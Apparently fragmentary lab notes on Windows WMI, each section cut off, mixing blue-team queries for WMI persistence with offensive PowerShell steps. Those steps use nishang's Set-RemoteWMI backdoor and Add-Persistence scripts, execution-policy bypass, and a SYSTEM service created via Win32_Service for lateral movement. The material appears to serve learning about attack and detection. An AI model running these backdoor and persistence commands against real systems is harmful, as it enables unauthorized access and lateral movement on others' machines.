WMI

WMI for Blue

Detecting Persistence: To detect persistence, the common filters, consumers and bindings can be analyzed manually, or a "detection" permanent event consumer can be created.

PS C:\Windows\system32> Get-WmiObject __eventfilter -Namespace root\subscription
PS C:\Windows\system32> Get-WmiObject activescripteventconsumer -Namespace root\subscription
PS C:\Windows\system32> Get-WmiObject commandlineeventconsumer -Namespace root\subscription
PS C:\Windows\system32> Get-WmiObject activescripteventconsumer -Namespace root\subscription

Using WMI permanent event consumers to alert […]

WMI

Security Descriptor

This allows a particular user or group on a WMI namespace the same privileges as an administrator:

PS C:\Users\victim6\Downloads> cd .\new\new\tool\tool\nishang-master\nishang-master\Backdoors\
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> . .\Set-RemoteWMI.ps1
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName victim6 -Verbose
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator -Verbose
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> powershell -ep bypass
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> . .\Set-RemoteWMI.ps1
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> help Set-RemoteWMI -Examples
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName […]

Powershell * WMI

Lateral Movement Command Execution Win32_service

List the methods of the Win32_Service class:

PS C:\Users\victim6\Downloads> (Get-CimClass -ClassName win32_service).CimClassMethods

Create a service:

PS C:\Users\victim6\Downloads> $servicetype = [byte] 16
PS C:\Users\victim6\Downloads> $ErrorControl = [byte] 1
PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_service -Name create -ArgumentList $false, "Windows performance", $ErrorControl, $null, $null, "WinPerf", "C:\Windows\System32\calc.exe", $null, $servicetype, "Manual", "NT Authority\system", " "
PS C:\Users\victim6\Downloads> Get-WmiObject -Class win32_service -Filter 'name = "WinPerf"'

Start the service:

PS C:\Users\victim6\Downloads> Get-WmiObject […]

Powershell * WMI

WMI Events

Extrinsic events: https://github.com/KurtDeGreeff/PlayPowershell

PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> . .\Get-WMINamespace.ps1
PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> $namespaces = Get-WMINamespace
PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> foreach ($ns in $namespaces) { Get-WmiObject -Namespace $ns -List | Where-Object { $_.__SUPERCLASS -eq '__ExtrinsicEvent' } }
PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> Get-WmiObject -Class Win32_PerfFormattedData_PerfOS_System
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master> cd .\Utility\
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> . .\Add-Persistence.ps1
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> help Add-Persistence -Examples
PS C:\Users\victim6\Downloads\new\new\tool\tool> cd .\nishang-master\
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master> cd .\nishang-master\
PS […]